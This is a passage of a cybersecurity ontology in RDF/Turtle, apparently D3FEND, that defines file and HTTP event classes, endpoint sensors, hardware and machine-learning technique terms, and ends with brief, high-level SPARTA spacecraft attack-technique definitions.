d3f:FTPPutEvent ], d3f:FTPEvent . d3f:FastSymbolicLink a owl:Class ; rdfs:label "Fast Symbolic Link" ; d3f:definition "Fast symbolic links, allow storage of the target path within the data structures used for storing file information on disk (e.g., within the inodes). This space normally stores a list of disk block addresses allocated to a file. Thus, symlinks with short target paths are accessed quickly. Systems with fast symlinks often fall back to using the original method if the target path exceeds the available inode space." ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf d3f:SymbolicLink, d3f:UnixLink ; owl:disjointWith d3f:SlowSymbolicLink ; skos:altLabel "Fast Symlink" . d3f:FileContentBlockMetadata a owl:Class ; rdfs:label "File Content Block Metadata" ; d3f:definition "Content Blocks may contain metadata specific to the block's content at the beginning." ; rdfs:subClassOf d3f:FileMetadata . d3f:FileCopyEvent a owl:Class ; rdfs:label "File Copy Event" ; d3f:definition "An event where a file is duplicated, creating a new file in a different location or under a different name while preserving the original file's content and attributes." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileAccessEvent ], d3f:FileCreationEvent . d3f:FileDecryptionEvent a owl:Class ; rdfs:label "File Decryption Event" ; d3f:definition "An event where a previously encrypted file is decoded, rendering its content accessible to authorized users or processes." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileEncryptionEvent ], d3f:FileEvent . d3f:FileDeletionEvent a owl:Class ; rdfs:label "File Deletion Event" ; d3f:definition "An event where a file is permanently removed from the file system or storage medium, potentially triggering actions related to data retention or recovery." ; rdfs:subClassOf d3f:FileEvent . d3f:FileFooterBlockContent a owl:Class ; rdfs:label "File Footer Block Content" ; d3f:definition "The content of a footer block not including the signature." ; rdfs:subClassOf d3f:FileMetadata . d3f:FileFooterBlockSignature a owl:Class ; rdfs:label "File Footer Block Signature" ; d3f:definition "A sequence of bytes used to identify and validate the footer section within a file." ; rdfs:subClassOf d3f:FileMetadata . d3f:FileGetAttributesEvent a owl:Class ; rdfs:label "File Get Attributes Event" ; d3f:definition "An event where a file's metadata attributes, such as size, creation date, or type, are queried or retrieved without altering its content." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileCreationEvent ], [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileAccessEvent ], d3f:FileEvent . d3f:FileGetPermissionsEvent a owl:Class ; rdfs:label "File Get Permissions Event" ; d3f:definition "An event where a file's security settings or access control list (ACL) is retrieved, detailing permissions granted to users or processes." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileCreationEvent ], d3f:FileEvent . d3f:FileHeaderBlockContent a owl:Class ; rdfs:label "File Header Block Content" ; d3f:definition "The content of a header block not including the signature." ; rdfs:subClassOf d3f:FileMetadata . d3f:FileRenamingEvent a owl:Class ; rdfs:label "File Renaming Event" ; d3f:definition "An event representing the renaming of a file, modifying its identifier within the file system while retaining its content and metadata." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileAccessEvent ], [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileCreationEvent ], d3f:FileEvent . d3f:FileServer a owl:Class ; rdfs:label "File Server" ; d3f:definition "The term server highlights the role of the machine in the traditional client-server scheme, where the clients are the workstations using the storage. A file server does not normally perform computational tasks or run programs on behalf of its client workstations. File servers are commonly found in schools and offices, where users use a local area network to connect their client computers." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Server . d3f:FileSetAttributesEvent a owl:Class ; rdfs:label "File Set Attributes Event" ; d3f:definition "An event where a file's metadata attributes are modified, such as changing its timestamps, labels, or categorization within the system." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileAccessEvent ], [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileCreationEvent ], d3f:FileEvent . d3f:FileSetPermissionsEvent a owl:Class ; rdfs:label "File Set Permissions Event" ; d3f:definition "An event involving the modification of a file's permissions or access control list (ACL), specifying which users or processes are granted or restricted access." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileCreationEvent ], d3f:FileEvent . d3f:FileShareService a owl:Class ; rdfs:label "File Share Service" ; d3f:definition "A file sharing service (or file share service) provides the ability to share data across a network." ; rdfs:seeAlso ; rdfs:subClassOf d3f:NetworkService . d3f:FileSystemSensor a owl:Class, owl:NamedIndividual ; rdfs:label "File System Sensor" ; d3f:definition "Collects files and file metadata on an endpoint." ; d3f:monitors d3f:File ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:monitors ; owl:someValuesFrom d3f:File ], d3f:EndpointSensor . d3f:FileUnmountEvent a owl:Class ; rdfs:label "File Unmount Event" ; d3f:definition "An event where a file system or storage volume is unmounted, disconnecting its files and directories from the operating system or applications." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileMountEvent ], d3f:FileEvent . d3f:FileUpdateEvent a owl:Class ; rdfs:label "File Update Event" ; d3f:definition "An event involving changes to the content or metadata of an existing file, reflecting updates that alter its state or properties." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileCreationEvent ], [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:FileAccessEvent ], d3f:FileEvent . d3f:FingerPrintScannerInputDevice a owl:Class ; rdfs:label "Finger Print Scanner Input Device" ; d3f:definition "A fingerprint sensor is an electronic device used to capture a digital image of the fingerprint pattern. The captured image is called a live scan. This live scan is digitally processed to create a biometric template (a collection of extracted features) which is stored and used for matching. Many technologies have been used including optical, capacitive, RF, thermal, piezoresistive, ultrasonic, piezoelectric, and MEMS." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:ImageScannerInputDevice ; skos:altLabel "Fingerprint Sensor" . d3f:FirmwareSensor a owl:Class, owl:NamedIndividual ; rdfs:label "Firmware Sensor" ; d3f:definition "Collects information on firmware installed on an Endpoint." ; d3f:monitors d3f:Firmware ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:monitors ; owl:someValuesFrom d3f:Firmware ], d3f:EndpointSensor . d3f:First-orderLogic a owl:Class, owl:NamedIndividual ; rdfs:label "First-order Logic" ; d3f:d3fend-id "D3A-FOL" ; d3f:definition "First-order logic is a collection of formal systems used in mathematics, philosophy, linguistics, and computer science. First-order logic uses quantified variables over non-logical objects, and allows the use of sentences that contain variables." ; d3f:kb-article """## How it works For propositions such as "Socrates is a man", one can have expressions in the form "there exists x such that x is Socrates and x is a man", where "there exists" is a quantifier, while x is a variable. This distinguishes it from propositional logic, which does not use quantifiers or relations. The term "first-order" distinguishes first-order logic from higher-order logic, in which there are predicates having predicates or functions as arguments, or in which quantification over predicates, functions, or both, are permitted. ## Considerations - Advantages: -- First-order logic is more expressive than propositional logic; one can talk about objects and their properties, relations between objects. -- First-order logic is able to make use of variables and quantifiers (e.g., "for all" and "exists".) -- First-order logic supports power forms of reasoning, such as inferring the properties of an unknown object from the properties of known objects. - Disadvantages: -- First-order logic is more difficult to learn and use than propositional logic, due to its greater complexity. -- First-order logic is also less tractable than propositional logic in many cases; reasoning about quantifiers and variables adds complexity. -- First-order logic can be difficult to apply in practice, due to the need to find appropriate axioms and rules for each application. ### Verification Approach - Automated theorem provers can assist in formal verification, performing automated reasoning over system modeled in first-order logic and explore a complete space of system behaviors - First-order logic may be more expressive than necessary for many types of problems and may be more difficult to verify by SMEs. - Theorem provers based in FOL are capable of use in software verification tasks, but an SMT solver such as Z3 might be more appropriate. - Defining a set of competency questions (i.e., query use cases for a first-order logic ontology) can help scope the logic required for a complete solution. ### Validation Approach - Domain SMEs should be identified to review the analytics results and compare them to expected results for a given input. - Where possible, an outside team of SMEs should inspect the formal logic specification of a system against its stated requirements and suitability to address its domain problem sets. - Defining a set of competency questions and the expected results provides one means of validation. ## References 1. First-order logic. (2023, May 26). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/First-order_logic) 2. Shapiro, S. and Kissel, T. Classical Logic. (2022). Stanford Encyclopedia of Philosophy. [Link](https://plato.stanford.edu/entries/logic-classical/) 3. A.I. For Anyone. First-order Logic (n.d.). [Link](https://www.aiforanyone.org/glossary/first-order-logic) 4. Smith, P. An Introduction to Formal Logic. (2020). [Link](https://doi.org/10.1017/9781108328999) 5. Gruninger, M. and Fox, M. (1995). Methodology for the Design and Evaluation of Ontologies. [Link](https://www.researchgate.net/publication/2288533_Methodology_for_the_Design_and_Evaluation_of_Ontologies) 6. Keet, C., Suarez-Figurosa, M., and Poveda-Villalon, M. (2014). Pitfalls in Ontologies and TIPS to Prevent Them. [Link](https://dl.acm.org/doi/10.4018/ijswis.2014040102) 7. Bjorner, N. et al. The inner magic behind the Z3 theorem prover. (2019) [Link](https://www.microsoft.com/en-us/research/blog/the-inner-magic-behind-the-z3-theorem-prover/)""" ; d3f:synonym "FOL", "First-order Predicate Calculus", "Quantificational Logic" ; rdfs:subClassOf d3f:PredicateLogic . d3f:First-stageBootLoader a owl:Class ; rdfs:label "First-stage Boot Loader" ; d3f:definition "The very first routine run in order to load the operating system." ; rdfs:subClassOf d3f:BootLoader . d3f:FlashMemory a owl:Class ; rdfs:label "Flash Memory" ; d3f:definition "Flash memory is an electronic non-volatile computer memory storage medium that can be electrically erased and reprogrammed." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:SecondaryStorage . d3f:ForwardProxyServer a owl:Class ; rdfs:label "Forward Proxy Server" ; d3f:definition "An forward (or open) proxy is a proxy server that is accessible by any Internet user. Generally, a proxy server only allows users within a network group (i.e. a closed proxy) to store and forward Internet services such as DNS or web pages to reduce and control the bandwidth used by the group. With an open proxy, however, any user on the Internet is able to use this forwarding service." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:ProxyServer . d3f:FullVolumeSnapshot a owl:Class ; rdfs:label "Full Volume Snapshot" ; d3f:definition "A full volume snapshot is a point-in-time copy of the complete contents of a volume." ; rdfs:seeAlso ; rdfs:subClassOf d3f:VolumeSnapshot . d3f:FuzzyLogic a owl:Class, owl:NamedIndividual ; rdfs:label "Fuzzy Logic" ; d3f:d3fend-id "D3A-FL" ; d3f:definition "Fuzzy logic is a form of many-valued logic in which the truth value of variables may be any real number between 0 and 1." ; d3f:kb-article """## How it works It is employed to handle the concept of partial truth, where the truth value may range between completely true and completely false.[1] By contrast, in Boolean logic, the truth values of variables may only be the integer values 0 or 1. ## References 1. Fuzzy logic. (2023, May 28). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Fuzzy_logic)""" ; rdfs:subClassOf d3f:SymbolicAI . d3f:GPT a owl:Class, owl:NamedIndividual ; rdfs:label "GPT" ; d3f:d3fend-id "D3A-GPT" ; d3f:definition "Generative pre-trained transformers (GPT) are a type of large language model (LLM) and a prominent framework for generative artificial intelligence." ; d3f:kb-article """## References Generative pre-trained transformer. (n.d.). In Wikipedia. [Link](https://en.wikipedia.org/wiki/Generative_pre-trained_transformer)""" ; d3f:synonym "Generative Pre-trained Transformer" ; rdfs:subClassOf d3f:Transformer-basedLearning . d3f:GatedRecurrentUnit a owl:Class, owl:NamedIndividual ; rdfs:label "Gated Recurrent Unit" ; d3f:d3fend-id "D3A-GRU" ; d3f:definition "The GRU is like a long short-term memory (LSTM) with a forget gate, but has fewer parameters than LSTM, as it lacks an output gate. GRU's performance on certain tasks of polyphonic music modeling, speech signal modeling and natural language processing was found to be similar to that of LSTM" ; d3f:kb-article """## References Wikipedia. (2021, September 20). Gated Recurrent Unit. [Link](https://en.wikipedia.org/wiki/Gated_recurrent_unit)""" ; rdfs:subClassOf d3f:RecurrentNeuralNetwork . d3f:GetForegroundWindow a d3f:GetOpenWindows, owl:NamedIndividual ; rdfs:label "Get Foreground Window" ; rdfs:isDefinedBy . d3f:GoodmanAndKruskalsGamma a owl:Class, owl:NamedIndividual ; rdfs:label "Goodman and Kruskal's Gamma" ; d3f:d3fend-id "D3A-GAKG" ; d3f:definition "Goodman-Kruskal $\\\\gamma$ is a measure of rank correlation between x and y and is given by $(n_c -n_d) / (n_c + n_d)$, where $n_c$ is the number of concordant pairs of the observations and $n_d$ is the number of discordant pairs." ; d3f:kb-article """## References 1. Wolfram Research. (2012). GoodmanKruskalGamma. Wolfram Language function. [Link](https://reference.wolfram.com/language/ref/GoodmanKruskalGamma.html) 1. Goodman and Kruskal's gamma. (2022, Nov 23). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Goodman_and_Kruskal%27s_gamma]""" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:RankCorrelationCoefficient . d3f:GradientBoostedDecisionTree a owl:Class, owl:NamedIndividual ; rdfs:label "Gradient-Boosted Decision Tree" ; d3f:d3fend-id "D3A-GBDT" ; d3f:definition "A gradient-boosted decision tree is, as in other bagging and boosting methods, a method where the relatively 'weak' machine learning model (a decision tree) is used in an ensemble to form a 'strong' machine learning model." ; d3f:kb-article """## Reference 1. Google. (28 Sep 2023). Gradient Boosted Decision Trees. [Link](https://developers.google.com/machine-learning/decision-forests/intro-to-gbdt).""" ; rdfs:subClassOf d3f:CART . d3f:Graph-basedSemi-supervisedLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Graph-based Semi-supervised Learning" ; d3f:d3fend-id "D3A-GBSSL" ; d3f:definition "Graph-based Semi-Supervised Learning (GSSL) methods aim to classify unlabeled data by learning the graph structure and labeled data jointly." ; d3f:kb-article """## References Yang, S., Pan, L., & Cheng, J. (2021). Graph-based Semi-Supervised Learning Methods for Imbalanced Data Classification. [Link](https://www.sciencedirect.com/science/article/pii/S0031320321002132?viewFullText=true).""" ; rdfs:subClassOf d3f:Semi-supervisedTransductiveLearning . d3f:GraphicsProcessingUnit a owl:Class, owl:NamedIndividual ; rdfs:label "Graphics Processing Unit" ; d3f:contains d3f:GraphicsCardFirmware ; d3f:definition "A Graphics Processing Unit (GPU) is a specialized processor designed to efficiently perform parallel computations, primarily for rendering graphics and visual data." ; d3f:synonym "GPU" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:GraphicsCardFirmware ], d3f:Processor . d3f:Grid-CNN a owl:Class, owl:NamedIndividual ; rdfs:label "Grid-CNN" ; d3f:d3fend-id "D3A-GC" ; d3f:definition "A class of neural networks that specializes in processing data that has a grid-like topology, such as an image." ; d3f:kb-article """## References Talukdar, P. (2020, June 10). Convolutional Neural Networks Explained. Towards Data Science. [Link](https://towardsdatascience.com/convolutional-neural-networks-explained-9cc5188c4939)""" ; rdfs:subClassOf d3f:ConvolutionalNeuralNetwork . d3f:Grid-basedClustering a owl:Class, owl:NamedIndividual ; rdfs:label "Grid-based Clustering" ; d3f:d3fend-id "D3A-GBC" ; d3f:definition "Divides the entire data space into a finite number of cells reducing the complexity of the data and focuses on the cells rather than the data." ; d3f:kb-article """## References TechVidvan. (n.d.). Clustering in Machine Learning Tutorial. [Link](https://techvidvan.com/tutorials/clustering-in-machine-learning/)""" ; rdfs:subClassOf d3f:High-dimensionClustering . d3f:GroupDeletionEvent a owl:Class ; rdfs:label "Group Deletion Event" ; d3f:definition "An event where an existing group is permanently removed from the system, dissolving its associated memberships and privileges." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:GroupCreationEvent ], d3f:GroupManagementEvent . d3f:HTTPConnectEvent a owl:Class ; rdfs:label "HTTP CONNECT Event" ; d3f:definition "An event where the HTTP CONNECT method is used to establish a tunnel to the server identified by the target resource." ; rdfs:subClassOf d3f:HTTPRequestEvent . d3f:HTTPDeleteEvent a owl:Class ; rdfs:label "HTTP DELETE Event" ; d3f:definition "An event where the HTTP DELETE method is used to delete the specified resource." ; rdfs:subClassOf d3f:HTTPRequestEvent . d3f:HTTPGetEvent a owl:Class ; rdfs:label "HTTP GET Event" ; d3f:definition "An event where the HTTP GET method is used to request a representation of the specified resource." ; rdfs:subClassOf d3f:HTTPRequestEvent . d3f:HTTPHeadEvent a owl:Class ; rdfs:label "HTTP HEAD Event" ; d3f:definition "An event where the HTTP HEAD method is used to request metadata about the specified resource without the response body." ; rdfs:subClassOf d3f:HTTPRequestEvent . d3f:HTTPOptionsEvent a owl:Class ; rdfs:label "HTTP OPTIONS Event" ; d3f:definition "An event where the HTTP OPTIONS method is used to describe the communication options for the target resource." ; rdfs:subClassOf d3f:HTTPRequestEvent . d3f:HTTPPostEvent a owl:Class ; rdfs:label "HTTP POST Event" ; d3f:definition "An event where the HTTP POST method is used to submit data to the specified resource, often causing a change in state or side effects on the server." ; rdfs:subClassOf d3f:HTTPRequestEvent . d3f:HTTPPutEvent a owl:Class ; rdfs:label "HTTP PUT Event" ; d3f:definition "An event where the HTTP PUT method is used to replace all current representations of the target resource with the request payload." ; rdfs:subClassOf d3f:HTTPRequestEvent . d3f:HTTPResponseEvent a owl:Class ; rdfs:label "HTTP Response Event" ; d3f:definition "An event where an HTTP response is sent from a server to a client over an established TCP connection." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:HTTPRequestEvent ], d3f:HTTPEvent . d3f:HTTPSURL a d3f:URL, owl:NamedIndividual ; rdfs:label "HTTPS URL" . d3f:HTTPTraceEvent a owl:Class ; rdfs:label "HTTP TRACE Event" ; d3f:definition "An event where the HTTP TRACE method is used to perform a message loop-back test along the path to the target resource." ; rdfs:subClassOf d3f:HTTPRequestEvent . d3f:HTTPURL a d3f:URL, owl:NamedIndividual ; rdfs:label "HTTP URL" . d3f:HardDiskFirmware a owl:Class ; rdfs:label "Hard Disk Firmware" ; d3f:definition "Firmware that is installed on a hard disk device." ; rdfs:seeAlso ; rdfs:subClassOf d3f:PeripheralFirmware ; skos:altLabel "Hard Drive Firmware" . d3f:HardeningEvent a owl:Class, owl:NamedIndividual ; rdfs:label "Hardening Event" ; d3f:definition "An event involving actions to strengthen defenses, such as applying patches or implementing secure configurations, reducing attack surfaces, and increasing the difficulty of exploitation by adversaries." ; d3f:related d3f:Harden ; rdfs:subClassOf d3f:SecurityEvent . d3f:HardwareDeviceDisabledEvent a owl:Class ; rdfs:label "Hardware Device Disabled Event" ; d3f:definition "An event where a device transitions to an inactive or unavailable state, often due to deactivation, failure, or maintenance." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:HardwareDeviceEnabledEvent ], d3f:HardwareDeviceStateEvent . d3f:HardwareDeviceDisconnectionEvent a owl:Class ; rdfs:label "Hardware Device Disconnection Event" ; d3f:definition "An event representing the removal of a device from a system, ceasing its operational functionality or availability." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:HardwareDeviceConnectionEvent ], d3f:HardwareDeviceStateEvent . d3f:HardwareDeviceMoveEvent a owl:Class ; rdfs:label "Hardware Device Move Event" ; d3f:definition "An event where a device is relocated or reassigned within a system or network, potentially affecting its operational scope or connectivity." ; rdfs:subClassOf d3f:HardwareDeviceStateEvent . d3f:HardwareDeviceUnbindEvent a owl:Class ; rdfs:label "Hardware Device Unbind Event" ; d3f:definition "An event where a device is logically unbound from a system or process, releasing it from exclusive use or integration." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:HardwareDeviceBindEvent ], d3f:HardwareDeviceStateEvent . d3f:HardwareDeviceUpdateEvent a owl:Class ; rdfs:label "Hardware Device Update Event" ; d3f:definition "An event capturing updates or changes to a device's configuration, properties, or state, including firmware updates, reconfigurations, or optimizations." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:HardwareDeviceConnectionEvent ], d3f:HardwareDeviceStateEvent . d3f:HeapSegment a owl:Class ; rdfs:label "Heap Segment" ; d3f:definition "The heap segment (or free store) is a large pool of memory from which dynamic memory requests of a process are allocated and satisfied." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ProcessSegment . d3f:HeterogeneousAsymmetricFeature-basedTransferLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Heterogeneous Asymmetric Feature-based Transfer Learning" ; d3f:d3fend-id "D3A-HAFBTL" ; d3f:definition "Asymmetric transformation mapping transforms the source feature space to align with that of the target or the target to that of the source. This, in effect, bridges the feature space gap and reduces the problem into a homogeneous transfer problem when further distribution differences need to be corrected." ; d3f:kb-article """## References Wang, Q., Mao, K. Z., Wang, B., & Guan, J. (2017). Big data clustering by hybrid optimization algorithm. Journal of Big Data, 4(1), 25. [Link](https://journalofbigdata.springeropen.com/articles/10.1186/s40537-017-0089-0).""" ; rdfs:subClassOf d3f:HeterogeneousTransferLearning . d3f:HeterogeneousFeature-basedTransferLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Heterogeneous Feature-based Transfer Learning" ; d3f:d3fend-id "D3A-HFBTL" ; d3f:definition "Symmetric transformation takes both the source feature space Xs and target feature space Xt and learns feature transformations as to project each onto a common subspace Xc for adaptation purposes. This derived subspace becomes a domain-invariant feature subspace to associate cross-domain data, and in effect, reduces marginal distribution differences." ; d3f:kb-article """## References Wang, Q., Mao, K. Z., Wang, B., & Guan, J. (2017). Big data clustering by hybrid optimization algorithm. Journal of Big Data, 4(1), 25. [Link](https://journalofbigdata.springeropen.com/articles/10.1186/s40537-017-0089-0).""" ; rdfs:subClassOf d3f:HeterogeneousTransferLearning . d3f:Higher-orderLogic a owl:Class, owl:NamedIndividual ; rdfs:label "Higher-order Logic" ; d3f:d3fend-id "D3A-HOL" ; d3f:definition "Higher-order logic is a form of predicate logic that is distinguished from first-order logic by additional quantifiers and, sometimes, stronger semantics. Higher-order logics with their standard semantics are more expressive, but their model-theoretic properties are less well-behaved than those of first-order logic." ; d3f:kb-article """## References 1. Higher-order logic. (2023, May 13). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Higher-order_logic)""" ; d3f:synonym "HOL" ; rdfs:subClassOf d3f:PredicateLogic . d3f:HostConfigurationSensor a owl:Class, owl:NamedIndividual ; rdfs:label "Host Configuration Sensor" ; d3f:definition "Collects the configuration data on an endpoint." ; d3f:monitors d3f:ApplicationConfiguration, d3f:OperatingSystemConfiguration ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:monitors ; owl:someValuesFrom d3f:OperatingSystemConfiguration ], [ a owl:Restriction ; owl:onProperty d3f:monitors ; owl:someValuesFrom d3f:ApplicationConfiguration ], d3f:EndpointSensor . d3f:HostGroup a owl:Class, owl:NamedIndividual ; rdfs:label "Host Group" ; d3f:contains d3f:Host ; d3f:definition "A collection of Hosts used to allow operations such as access control to be applied to the entire group." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:Host ], d3f:AccessControlGroup . d3f:Hostname a d3f:DomainName, owl:Class, owl:NamedIndividual ; rdfs:label "Hostname" ; d3f:definition "In computer networking, a hostname (archaically nodename) is a label that is assigned to a device connected to a computer network and that is used to identify the device in various forms of electronic communication, such as the World Wide Web. Hostnames may be simple names consisting of a single word or phrase, or they may be structured." ; d3f:identifies d3f:Host ; rdfs:isDefinedBy ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:identifies ; owl:someValuesFrom d3f:Host ], d3f:Identifier ; skos:altLabel "Nodename" . d3f:HumanInputDeviceFirmware a owl:Class ; rdfs:label "Human Input Device Firmware" ; d3f:definition "Firmware that is installed on an HCI device such as a mouse or keyboard." ; rdfs:seeAlso d3f:Firmware, ; rdfs:subClassOf d3f:PeripheralFirmware . d3f:Hybrid-basedTransferLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Hybrid-based Transfer Learning" ; d3f:d3fend-id "D3A-HBTL" ; d3f:definition "This method creates an asymmetric mapping from the target to the source and takes into account bias issues of cross-domain correspondences." ; d3f:kb-article """## References Day, O., & Khoshgoftaar, T.M. (2017). A survey on heterogeneous transfer learning. Journal of Big Data, 4(1), 29. [Link](https://doi.org/10.1186/s40537-017-0089-0).""" ; rdfs:subClassOf d3f:HomogenousTransferLearning . d3f:IA-0001.01 a owl:Class ; rdfs:label "Software Dependencies & Development Tools - SPARTA" ; d3f:attack-id "IA-0001.01" ; d3f:definition "Threat actors may manipulate software dependencies (i.e. dependency confusion) and/or development tools prior to the customer receiving them in order to achieve data or system compromise. Software binaries and applications often depend on external software to function properly. spacecraft developers may use open source projects to help with their creation. These open source projects may be targeted by threat actors as a way to add malicious code to the victim spacecraft's dependencies." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0001 ; skos:prefLabel "Software Dependencies & Development Tools" . d3f:IA-0001.02 a owl:Class ; rdfs:label "Software Supply Chain - SPARTA" ; d3f:attack-id "IA-0001.02" ; d3f:definition "Threat actors may manipulate software binaries and applications prior to the customer receiving them in order to achieve data or system compromise. This attack can take place in a number of ways, including manipulation of source code, manipulation of the update and/or distribution mechanism, or replacing compiled versions with a malicious one." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0001 ; skos:prefLabel "Software Supply Chain" . d3f:IA-0001.03 a owl:Class ; rdfs:label "Hardware Supply Chain - SPARTA" ; d3f:attack-id "IA-0001.03" ; d3f:definition "Threat actors may manipulate hardware components in the victim spacecraft prior to the customer receiving them in order to achieve data or system compromise. The threat actor can insert backdoors and give them a high level of control over the system when they modify the hardware or firmware in the supply chain. This would include ASIC and FPGA devices as well. A spacecraft component can also be damaged if a specific HW component, built to fail after a specific period, or counterfeit with a low reliability, breaks out." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0001 ; skos:prefLabel "Hardware Supply Chain" . d3f:IA-0002 a owl:Class ; rdfs:label "Compromise Software Defined Radio - SPARTA" ; d3f:attack-id "IA-0002" ; d3f:definition "Threat actors may target software defined radios due to their software nature to establish C2 channels. Since SDRs are programmable, when combined with supply chain or development environment attacks, SDRs provide a pathway to setup covert C2 channels for a threat actor." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAInitialAccessTechnique ; skos:prefLabel "Compromise Software Defined Radio" . d3f:IA-0003 a owl:Class ; rdfs:label "Crosslink via Compromised Neighbor - SPARTA" ; d3f:attack-id "IA-0003" ; d3f:definition "Threat actors may compromise a victim spacecraft via the crosslink communications of a neighboring spacecraft that has been compromised. spacecraft in close proximity are able to send commands back and forth. Threat actors may be able to leverage this access to compromise other spacecraft once they have access to another that is nearby." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAInitialAccessTechnique ; skos:prefLabel "Crosslink via Compromised Neighbor" . d3f:IA-0004.01 a owl:Class ; rdfs:label "Ground Station - SPARTA" ; d3f:attack-id "IA-0004.01" ; d3f:definition "Threat actors may establish a foothold within the backup ground/mission operations center (MOC) and then perform attacks to force primary communication traffic through the backup communication channel so that other TTPs can be executed (man-in-the-middle, malicious commanding, malicious code, etc.). While an attacker would not be required to force the communications through the backup channel vice waiting until the backup is used for various reasons. Threat actors can also utilize compromised ground stations to chain command execution and payload delivery across geo-separated ground stations to extend reach and maintain access on spacecraft. The backup ground/MOC should be considered a viable attack vector and the appropriate/equivalent security controls from the primary communication channel should be on the backup ground/MOC as well." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0004 ; skos:prefLabel "Ground Station" . d3f:IA-0004.02 a owl:Class ; rdfs:label "Receiver - SPARTA" ; d3f:attack-id "IA-0004.02" ; d3f:definition "Threat actors may target the backup/secondary receiver on the spacecraft as a method to inject malicious communications into the mission. The secondary receivers may come from different supply chains than the primary which could have different level of security and weaknesses. Similar to the ground station, the communication through the secondary receiver could be forced or happening naturally." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0004 ; skos:prefLabel "Receiver" . d3f:IA-0005.01 a owl:Class ; rdfs:label "Compromise Emanations - SPARTA" ; d3f:attack-id "IA-0005.01" ; d3f:definition "Threat actors in close proximity may intercept and analyze electromagnetic radiation emanating from crypto equipment and/or the target spacecraft(i.e., main bus) to determine whether the emanations are information bearing. The data could be used to establish initial access." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0005 ; skos:prefLabel "Compromise Emanations" . d3f:IA-0005.02 a owl:Class ; rdfs:label "Docked Vehicle / OSAM - SPARTA" ; d3f:attack-id "IA-0005.02" ; d3f:definition "Threat actors may leverage docking vehicles to laterally move into a target spacecraft. If information is known on docking plans, a threat actor may target vehicles on the ground or in space to deploy malware to laterally move or execute malware on the target spacecraft via the docking interface." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0005 ; skos:prefLabel "Docked Vehicle / OSAM" . d3f:IA-0005.03 a owl:Class ; rdfs:label "Proximity Grappling - SPARTA" ; d3f:attack-id "IA-0005.03" ; d3f:definition "Threat actors may posses the capability to grapple target spacecraft once it has established the appropriate space rendezvous. If from a proximity / rendezvous perspective a threat actor has the ability to connect via docking interface or expose testing (i.e., JTAG port) once it has grappled the target spacecraft, they could perform various attacks depending on the access enabled via the physical connection." ; rdfs:seeAlso ; rdfs:subClassOf d3f:IA-0005 ; skos:prefLabel "Proximity Grappling" . d3f:IA-0006 a owl:Class ; rdfs:label "Compromise Hosted Payload - SPARTA" ; d3f:attack-id "IA-0006" ; d3f:definition "Threat actors may compromise the target spacecraft hosted payload to initially access and/or persist within the system. Hosted payloads can usually be accessed from the ground via a specific command set. The command pathways can leverage the same ground infrastructure or some host payloads have their own ground infrastructure which can provide an access vector as well. Threat actors may be able to leverage the ability to command hosted payloads to upload files or modify memory addresses in order to compromise the system. Depending on the implementation, hosted payloads may provide 